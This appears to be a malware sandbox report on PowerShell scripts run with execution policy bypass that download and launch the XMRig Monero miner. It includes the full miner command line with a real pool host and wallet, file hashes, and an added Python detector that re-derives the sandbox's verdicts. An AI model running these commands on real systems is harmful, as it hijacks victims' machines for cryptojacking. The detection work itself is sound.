N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 84.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
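The three Windows 10 runs in this report (behavioral14 here, behavioral22 and behavioral2 below) show one chain: powershell.exe started with -ExecutionPolicy bypass, network traffic to github.com and objects.githubusercontent.com, a dropped C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe, and that binary connecting to gulf.moneroocean.stream:10128 with a Monero wallet on XMRig's -u switch. The Files tables also list a __PSScriptPolicyTest_*.ps1 whose MD5/SHA-1/SHA-256 are exactly the hashes of the single byte "1": that file is written by powershell.exe itself to probe AppLocker/WDAC script enforcement, not dropped by the script. The Python below is an added example for this page, not sandbox or XMRig code. It re-derives those verdicts from the raw rows so the same logic can run over EDR process-creation and flow events; its inputs are constructed copies of the behavioral14 rows, and the Monero address shape (95 base58 characters starting with 4) and the assumed pool-switch forms are stated in the comments.

```python
"""Re-derives this report's miner verdict from its raw process, network and file rows.
Added example for this page, not sandbox or XMRig code; inputs are constructed copies of the behavioral14 rows."""
import hashlib
import re
from collections import namedtuple
from pathlib import PureWindowsPath

# Monero standard addresses: 95 base58 characters, the first one '4' ('8' for subaddresses).
MONERO_ADDR = re.compile(r"[48][1-9A-HJ-NP-Za-km-z]{94}")
# Pool endpoint as given to -o/--url, with or without a stratum scheme prefix.
HOST_PORT = re.compile(r"^(?:stratum\+(?:ssl|tcp)://)?([A-Za-z0-9.\-]+):(\d{1,5})$")
# -ExecutionPolicy (or the -ep/-exec abbreviations) followed by a value that disables script policy.
POLICY_BYPASS = re.compile(r"-(?:executionpolicy|ep|exec)\s+(?:bypass|unrestricted)\b", re.I)
# powershell.exe itself writes __PSScriptPolicyTest_<random>.ps1 containing the single byte "1"
# to probe AppLocker/WDAC enforcement; the hashes listed for it in the Files tables are those of b"1".
PS_PROBE_MD5 = hashlib.md5(b"1").hexdigest()
Finding = namedtuple("Finding", "rule detail")


def split_cmdline(cmdline: str) -> list[str]:
    """Windows-style tokenizer: whitespace separates, double quotes group one token."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmdline)]


def miner_endpoints(argv: list[str]):
    """((host, port), wallet) taken from xmrig-style -o/-u switches; None where absent."""
    pool = wallet = None
    for i, arg in enumerate(argv[1:-1], start=1):
        if arg in ("-o", "--url") and (m := HOST_PORT.match(argv[i + 1])):
            pool = (m.group(1).lower(), int(m.group(2)))
        elif arg in ("-u", "--user") and MONERO_ADDR.fullmatch(argv[i + 1]):
            wallet = argv[i + 1]
    return pool, wallet


def scan_process(cmdline: str) -> list[Finding]:
    """Mirrors the signatures the sandbox raised on one process command line."""
    argv = split_cmdline(cmdline)
    if not argv:
        return []
    image = PureWindowsPath(argv[0])
    name, parts = image.name.lower(), [p.lower() for p in image.parts]
    findings = []
    # "Executes dropped EXE": an image launched out of the user's %TEMP% tree.
    if name.endswith(".exe") and "appdata" in parts and "temp" in parts:
        findings.append(Finding("dropped_exe", str(image)))
    # "Command and Scripting Interpreter: PowerShell" with script policy switched off.
    if name in ("powershell.exe", "pwsh.exe") and POLICY_BYPASS.search(cmdline):
        findings.append(Finding("powershell_policy_bypass", cmdline))
    # XMRig: known image name, or any binary handed a pool endpoint plus a Monero wallet.
    pool, wallet = miner_endpoints(argv)
    if name.startswith("xmrig") or (pool and wallet):
        findings.append(Finding("xmrig_miner", f"pool={pool} wallet={wallet}"))
    return findings


def scan_network(rows, pools) -> list[Finding]:
    """TCP flows to a pool host/port seen on a command line; rows are (country, 'ip:port', domain, proto)."""
    hosts, ports = {h for h, _ in pools}, {p for _, p in pools}
    out = []
    for country, dest, domain, proto in rows:
        ip, _, port = dest.rpartition(":")
        if proto == "tcp" and (domain.lower() in hosts or int(port) in ports):
            out.append(Finding("pool_connection", f"{domain or ip}:{port} ({country})"))
    return out


def classify_file(path: str, md5: str) -> str:
    """The probe's name alone is not trusted (anyone can reuse it); the content hash must match too."""
    if PureWindowsPath(path).name.startswith("__PSScriptPolicyTest_") and md5.lower() == PS_PROBE_MD5:
        return "benign: PowerShell policy probe"
    return "review"


# Constructed from the behavioral14 rows above (same command lines, pool, wallet and hashes).
PROCESSES = [
    r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"',
    r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 '
    r"-u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF",
]
NETWORK = [
    ("US", "185.199.108.133:443", "objects.githubusercontent.com", "tcp"),
    ("US", "8.8.8.8:53", "gulf.moneroocean.stream", "udp"),
    ("DE", "149.102.143.109:10128", "gulf.moneroocean.stream", "tcp"),
]
FILES = [
    (r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rp2ujln0.zhu.ps1", "c4ca4238a0b923820dcc509a6f75849b"),
    (r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe", "205ad9eb6acd6f58752899669b69fe74"),
]


def run_report(processes=PROCESSES, network=NETWORK, files=FILES) -> dict:
    """Process rows first, then the flows they explain, then the file list."""
    pools = {pool for cmd in processes if (pool := miner_endpoints(split_cmdline(cmd))[0])}
    return {
        "process": [f for cmd in processes for f in scan_process(cmd)],
        "pools": pools,
        "network": scan_network(network, pools),
        "files": {path: classify_file(path, md5) for path, md5 in files},
    }
```

On the rows above run_report() returns powershell_policy_bypass, dropped_exe and xmrig_miner for the two processes, one pool_connection for the 149.102.143.109:10128 flow (the DNS lookup of the pool is deliberately not counted, only the TCP session), and marks the __PSScriptPolicyTest file as PowerShell's own probe while leaving xmrig.exe for review. The Windows 11 runs (behavioral32 and behavioral16 below) never reach the miner stage, so only powershell_policy_bypass would fire there; their __PSScriptPolicyTest file also carries a different hash, so classify_file falls back to "review" for it rather than trusting the file name.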

Files

memory/2836-3-0x00007FFB570B3000-0x00007FFB570B4000-memory.dmp

memory/2836-5-0x0000018FEC690000-0x0000018FEC6B2000-memory.dmp

memory/2836-8-0x00007FFB570B0000-0x00007FFB57A9C000-memory.dmp

memory/2836-9-0x0000018FEC890000-0x0000018FEC906000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rp2ujln0.zhu.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2836-10-0x00007FFB570B0000-0x00007FFB57A9C000-memory.dmp

memory/2836-25-0x00007FFB570B0000-0x00007FFB57A9C000-memory.dmp

memory/2836-48-0x0000018FEC840000-0x0000018FEC852000-memory.dmp

memory/2836-61-0x0000018FEC820000-0x0000018FEC82A000-memory.dmp

memory/2836-83-0x00007FFB570B3000-0x00007FFB570B4000-memory.dmp

memory/2836-89-0x00007FFB570B0000-0x00007FFB57A9C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2352-92-0x000001F42DBB0000-0x000001F42DBD0000-memory.dmp

memory/2352-93-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2836-94-0x00007FFB570B0000-0x00007FFB57A9C000-memory.dmp

memory/2352-95-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-96-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-97-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-98-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-99-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-100-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-101-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-102-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-103-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-104-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-105-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-106-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-107-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-108-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-109-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-110-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-111-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-112-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-113-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-114-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-115-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-116-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-117-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-118-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-119-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-120-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-121-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-122-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-123-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-124-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-125-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-126-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-127-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-128-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-129-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-130-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-131-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-132-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-133-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-134-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-135-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-136-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-137-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-138-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-139-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-140-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-141-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-142-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-143-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-144-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-145-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-146-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-147-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-148-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-149-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-150-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-151-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-152-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-153-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-154-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-155-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

memory/2352-156-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:12

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1773s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 matches; the sandbox exported every column as N/A, so no description, indicator, process or target is recorded for this rule)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 52.111.229.48:443 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 130.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/4880-4-0x00007FFA64193000-0x00007FFA64194000-memory.dmp

memory/4880-5-0x000001E940F90000-0x000001E940FB2000-memory.dmp

memory/4880-6-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp

memory/4880-9-0x000001E9595C0000-0x000001E959636000-memory.dmp

memory/4880-10-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n2vyj2g2.zjo.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4880-25-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp

memory/4880-48-0x000001E941040000-0x000001E941052000-memory.dmp

memory/4880-61-0x000001E941020000-0x000001E94102A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3256-90-0x000001839B300000-0x000001839B320000-memory.dmp

memory/3256-91-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-92-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/4880-93-0x00007FFA64193000-0x00007FFA64194000-memory.dmp

memory/4880-94-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp

memory/4880-95-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp

memory/3256-96-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-97-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-98-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-99-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-100-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-101-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-102-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-103-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-104-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-105-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-106-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-107-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-108-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-109-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-110-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-111-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-112-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-113-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-114-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-115-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-116-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-117-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-118-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-119-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-120-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-121-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-122-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-123-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-124-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-125-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-126-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-127-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-128-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-129-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-130-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-131-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-132-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-133-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-134-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-135-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-136-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-137-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-138-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-139-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-140-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-141-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-142-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-143-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-144-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-145-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-146-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-147-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-148-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-149-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-150-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-151-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-152-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-153-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-154-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-155-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

memory/3256-156-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:18

Platform

win11-20240508-en

Max time kernel

1646s

Max time network

1657s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
IE 52.111.236.22:443 tcp

Files

memory/2632-0-0x00007FFF8D633000-0x00007FFF8D635000-memory.dmp

memory/2632-6-0x000001B849210000-0x000001B849232000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cisfmsdk.qxc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2632-10-0x00007FFF8D630000-0x00007FFF8E0F2000-memory.dmp

memory/2632-11-0x00007FFF8D630000-0x00007FFF8E0F2000-memory.dmp

memory/2632-12-0x00007FFF8D630000-0x00007FFF8E0F2000-memory.dmp

memory/2632-13-0x00007FFF8D630000-0x00007FFF8E0F2000-memory.dmp

memory/2632-14-0x00007FFF8D633000-0x00007FFF8D635000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 15:50

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1805s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 matches; the sandbox exported every column as N/A, so no description, indicator, process or target is recorded for this rule)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 198.111.78.13.in-addr.arpa udp
US 8.8.8.8:53 152.107.17.2.in-addr.arpa udp

Files

